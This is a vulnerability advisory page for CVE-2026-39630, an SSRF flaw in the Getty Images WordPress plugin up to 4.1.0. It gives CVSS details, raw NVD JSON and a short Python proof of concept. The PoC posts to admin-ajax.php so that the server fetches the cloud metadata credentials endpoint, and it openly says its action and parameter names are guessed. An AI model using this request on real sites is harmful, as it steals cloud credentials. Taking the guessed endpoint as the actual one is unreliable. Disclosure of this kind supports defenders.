Security Vulnerability Report
中文
CVE-2026-39630 CVSS 6.4 MEDIUM

CVE-2026-39630

Published: 2026-04-08 09:16:33
Last Modified: 2026-04-24 18:06:25

Description

Server-Side Request Forgery (SSRF) vulnerability in Getty Images Getty Images getty-images allows Server Side Request Forgery.This issue affects Getty Images: from n/a through <= 4.1.0.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Getty Images <= 4.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Getty Images Plugin <= 4.1.0 SSRF PoC # Description: Demonstrates Server-Side Request Forgery by targeting internal metadata. target_url = "http://example-wordpress-site.com" # The vulnerable endpoint parameter (example based on common WP plugin structure) vulnerable_param = "image_url" # Internal metadata endpoint commonly used in cloud environments (AWS/Azure/GCP) internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Send payload payload = { "action": "getty_images_fetch", vulnerable_param: internal_target } try: response = requests.post(target_url + "/wp-admin/admin-ajax.php", data=payload) if response.status_code == 200: print("[+] Potential SSRF vulnerability confirmed.") print("[+] Server responded:") print(response.text[:500]) # Print snippet of response else: print("[-] Request returned status code:", response.status_code) except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39630", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:33.473", "lastModified": "2026-04-24T18:06:24.707", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Getty Images Getty Images getty-images allows Server Side Request Forgery.This issue affects Getty Images: from n/a through <= 4.1.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/getty-images/vulnerability/wordpress-getty-images-plugin-4-1-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}